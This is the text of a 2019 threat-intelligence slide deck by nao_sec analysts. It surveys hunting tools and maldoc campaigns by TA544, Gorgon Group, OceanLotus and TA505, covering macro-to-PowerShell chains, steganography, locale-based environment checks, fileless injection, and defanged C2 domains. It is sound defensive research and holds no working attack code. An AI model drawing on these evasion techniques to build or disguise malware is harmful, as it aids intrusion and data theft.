![Page 1: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/1.jpg)
Copyright©2019 nao_sec All Rights Reserved.1
![Page 2: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/2.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Who are we
• Shota Nakajima• Malware Analyst
• Engage in incident response
• Work at Cyber Defense Institute, Inc. in Japan
• Rintaro Koike• Chief researcher / founder of nao_sec
• Threat Hunter
• Malicious traffic / script / document analyst• Especially Drive-by Download attack
2
![Page 3: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/3.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Public Service for Hunting
• VirusTotal• Private API
• Yara (Live & Retro Hunt)
• Hybrid Analysis• Yara (Retro Hunt)
• ATT&CK Tactic & Technique
• ANY.RUN• ATT&CK Technique
• Suricata SID
3
![Page 4: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/4.jpg)
Copyright©2019 nao_sec All Rights Reserved.
VirusTotal Private API
• Our queries• maldoc(0 < positive) submitter JP
• suspicious(0 < positive) zip submitter JP
• suspicious(0 < positive) lnk submitter JP
• suspicious(0 < positive) rtf submitter JP
• email submitter JP
4
![Page 5: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/5.jpg)
Copyright©2019 nao_sec All Rights Reserved.
VirusTotal Private API
• Engines• if you want hunt specified family
5
![Page 6: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/6.jpg)
Copyright©2019 nao_sec All Rights Reserved.
VirusTotal Livehunt
• Have been set following rules• CVE_2018_0798
• CVE_2017_11882
• CVE_2018_0802
• CVE_2018_20250
6
![Page 7: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/7.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Hybrid Analysis
7
![Page 8: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/8.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Hybrid Analysis
8
![Page 9: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/9.jpg)
Copyright©2019 nao_sec All Rights Reserved.
ANY.RUN
9
![Page 10: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/10.jpg)
Copyright©2019 nao_sec All Rights Reserved.
T1170 - Mshta
10
![Page 11: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/11.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Gorgon Group
11
![Page 12: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/12.jpg)
Copyright©2019 nao_sec All Rights Reserved.
T1085 – Rundll32
12
![Page 13: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/13.jpg)
Copyright©2019 nao_sec All Rights Reserved.
OceanLotus
13
![Page 14: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/14.jpg)
Copyright©2019 nao_sec All Rights Reserved.
T1137 - Office Application Startup
14
![Page 15: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/15.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Tick
15
![Page 16: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/16.jpg)
Copyright©2019 nao_sec All Rights Reserved.
TA544
16
![Page 17: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/17.jpg)
Copyright©2019 nao_sec All Rights Reserved.
TA544
• Attack by TA544 (Cutwail-A / invoice) Group• Maldoc disguised as a purchase order, bill etc...
• The purpose is to infect Ursnif and steal user information
• Attack campaign has been observed since around June 2016
• Started to use steganography after October 24, 2018
• Started to detect the environment after December 18, 2018
• The same attack has been observed in Italy• https://blog.yoroi.company/research/ursnif-long-live-the-steganography/
17
![Page 18: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/18.jpg)
Copyright©2019 nao_sec All Rights Reserved.
TA544
• Attack by TA544 (Cutwail-A / invoice) Group1. Send E-mail with attached (Excel) file from Cutwail Botnet
2. Macro runs when opening Excel file
3. Processing transition from macro to PowerShell
4. PowerShell runs Bebloh (URLZone)
5. Bebloh downloads and runs Ursnif
18
![Page 19: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/19.jpg)
Copyright©2019 nao_sec All Rights Reserved.
2018-12-18
19
![Page 20: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/20.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Excel Macro
20
![Page 21: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/21.jpg)
Copyright©2019 nao_sec All Rights Reserved.
xlCountrySetting
21
![Page 22: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/22.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Invoke-PSImage
22
![Page 23: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/23.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Get-Culture
23
![Page 24: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/24.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Invoke-ReflectivePEInjection
DLL version of Beblohruns fileless
24
![Page 25: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/25.jpg)
Copyright©2019 nao_sec All Rights Reserved.
[2019-02-11]
CultureInfo.CurrentCulture
25
![Page 26: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/26.jpg)
Copyright©2019 nao_sec All Rights Reserved.
[2019-02-18]
Format Currency
26
![Page 27: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/27.jpg)
Copyright©2019 nao_sec All Rights Reserved.
[2019-02-26]
IP address geolocation
27
![Page 28: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/28.jpg)
Copyright©2019 nao_sec All Rights Reserved.
[2019-02-28]
GetUserDefaultLCID and GetLocaleInfo
28
![Page 29: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/29.jpg)
Copyright©2019 nao_sec All Rights Reserved.
[2019-03-06]
Symbol programming
29
![Page 30: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/30.jpg)
Copyright©2019 nao_sec All Rights Reserved.
[2019-03-06]
Steganography by .NET Assembly
30
![Page 31: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/31.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Interesting features
• Steganography (Invoke-PSImage)• In the process, additional code or Bebloh is generated from the data embedded in the image file
• Attack campaigns that use steganography continuously are rare...?
• Environmental detection• Check multiple times whether exectution environment is correct as target
• OS language・Currency setting、IP address geoLocation
• Analysis interference• Bebloh runs fileless
• Invoke-ReflectivePEInjection
• Multiple obfuscation, dynamic execution, processing in multiple language
• Obfuscation like jjencode
31
![Page 32: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/32.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Summary
• The techniques used by the TA544 are evolving• Steganography (PowerShell & .NET)
• Environmental detection• xlCountrySetting
• Get-Culture
• CultureInfo.CurrentCulture
• Format Currency
• GetUserDefaultLCID + GetLocaleInfo
• Fileless execution• Invoke-ReflectivePEInjection
→Monitor and limit the execution of macro and PowerShell properly
→Early threat information collection and deployment
32
![Page 33: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/33.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Gorgon Group
33
![Page 34: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/34.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Gorgon Group
• Gorgon Group has been targeted UK, Spain, Russia and USA government
• Related to Pakistan actors
• Using public service• Bitly
• Pastebin
• Blogger
34
![Page 35: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/35.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Macro
35
![Page 36: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/36.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Access to Bitly link
36
![Page 37: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/37.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Access to Bitly link
37
![Page 38: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/38.jpg)
Copyright©2019 nao_sec All Rights Reserved.
27.html
• To read blog-pages.html, and it seems to be an update process
38
![Page 39: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/39.jpg)
Copyright©2019 nao_sec All Rights Reserved.
27.html
• The process of acquiring data from Pastebin, decoding and executing it at the bottom of 27.html is written in VBScript
• What is pasted on Pastebin is Base64 encoded malware
39
![Page 40: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/40.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Pastebin
• Pastebin was logged in and used• User name
• HAGGA
40
![Page 41: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/41.jpg)
Copyright©2019 nao_sec All Rights Reserved.
RevengeRAT
• It was .NET assembly when decoding the data that was put in Pastebin
• As a result of decompiling this, this seems to be RevengeRAT
41
![Page 42: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/42.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Summary
• It has been observed all over the world
• T1170 - MSHTA
• Public services• Bitly
• Blogger
• Pastebin
42
![Page 43: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/43.jpg)
Copyright©2019 nao_sec All Rights Reserved.
OceanLotus
43
![Page 44: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/44.jpg)
Copyright©2019 nao_sec All Rights Reserved.
OceanLotus
• Other name• APT32, APT-C-00, SeaLotus
• This group is believed to be related to Vietnam
• It has been active since at least 2014
• In this March, An attack on a Southeast Asian base of an automobile company (including Japanese) was reported
https://www.bloomberg.com/news/articles/2019-03-20/vietnam-tied-hackers-target-auto-industry-firms-fireeye-says
44
![Page 45: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/45.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Pattern 1
Shellcode
VBA
load memory
decode
backdoor
C2 module
decoder
https://app.any.run/tasks/330f9f1e-c8a4-4dea-b74f-c6c6eb90b899/
metaimg1.wmf
45
![Page 46: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/46.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Macro
46
![Page 47: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/47.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Macro
xor 0xCA=> 4D 5A (MZ)
47
![Page 48: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/48.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Macro
48
![Page 49: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/49.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Decoder DLL
• This Dll Only 1byte xor decode WMF
• WMF is shellcode
49
![Page 50: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/50.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Shellcode (Backdoor Launcher)
• DOS header in shellcode• other part(header and code)is encrypted
• OceanLotus often use this pattern
• Head is the call instruction
50
![Page 51: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/51.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Backdoor DLLs
• Backdoor DLL have encoded data in Resource
• Connect C2shttp[:]//ps.andreagahuvrauvin.comhttp[:]//paste.christienollmache.xyzhttp[:]//att.illagedrivestralia.xyz
51
![Page 52: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/52.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Backdoor DLLs
• Create key• SOFTWARE¥Classes¥CLSID¥{E3517E26-8E93-458D-A6DF-8030BC80528B}
• Export• CreateInstance function
52
![Page 53: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/53.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Relevance
• This DLL related Cylance report• OceanLotus Steganography Malware Analysis White paper
• Same Registry and CLID
• Same Export function
https://www.cylance.com/en-us/lp/threat-research-and-intelligence/oceanlotus-steganography-malware-analysis-white-paper-2019.html
53
![Page 54: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/54.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Pattern 2
https://app.any.run/tasks/16a7605e-6e75-4b35-82d8-aa30cefd342d/
VBA Shellcode backdoor
54
![Page 55: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/55.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Macro
55
![Page 56: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/56.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Macro
56
![Page 57: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/57.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Relevance
• some points that match the code of cobalt strike.
57
![Page 58: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/58.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Shellcode
• DOS header in shellcode• other part(header and code)is encrypted
• same as pattern1
58
![Page 59: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/59.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Backdoor DLLs
• same backdoor as pattern1• strings
• BinDiff result
pattern2 pattern1
59
![Page 60: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/60.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Summary
• Using Cobalt Strike
• Unique shellcode
• Encoded multiple times • T1140
• Keep data in resource area
60
![Page 61: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/61.jpg)
Copyright©2019 nao_sec All Rights Reserved.
TA505
61
![Page 62: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/62.jpg)
Copyright©2019 nao_sec All Rights Reserved.
TA505
• This group named TA505 by ProofPoint
• TA505 has been in the cybercrime business since around 2015• Not APT
• Early days• Sending malspam emails that infected banking Trojans and ransomware
• Recently• Spread document files infected with RATs and bots mainly in Korea
• An attack on Japan was also observed
62
![Page 63: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/63.jpg)
Copyright©2019 nao_sec All Rights Reserved.
TA505 case by KRCERT
• KRCERT has published an attack flow with TA505• However we have only spotted a part of attack.
https://www.krcert.or.kr/filedownload.do?attach_file_seq=2169&attach_file_id=EpF2169.pdf
63
![Page 64: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/64.jpg)
Copyright©2019 nao_sec All Rights Reserved.
In Japanese case
• malspam by TA505 targeted Japan in February• It pushed FlawedAmmyy
• The subject and the text are interesting• It copied malspam sent by other actors the day before
https://twitter.com/nao_sec/status/1098069300340903936
64
![Page 65: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/65.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Excel document file
65
![Page 66: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/66.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Excel document file
66
![Page 67: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/67.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Word document file
$ python oledump.py request.doc1: 146 '¥x01CompObj'2: 4096 '¥x05DocumentSummaryInformation'3: 4096 '¥x05SummaryInformation'4: 6858 '1Table'5: 421 'Macros/PROJECT'6: 71 'Macros/PROJECTwm'7: M 95423 'Macros/VBA/NewMacros'8: m 1020 'Macros/VBA/ThisDocument'9: 28021 'Macros/VBA/_VBA_PROJECT'
67
![Page 68: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/68.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Malware
• FlawedAmmyy• RAT created based on leaked Ammyy source code
• Clop• ransomware
• Amadey• Multifunctional bot
There are also others…
68
![Page 69: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/69.jpg)
Copyright©2019 nao_sec All Rights Reserved.
FlawedAmmyy
• Signed
69
![Page 70: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/70.jpg)
Copyright©2019 nao_sec All Rights Reserved.
FlawedAmmyy
• Install by msiexec.exe
• Download …
70
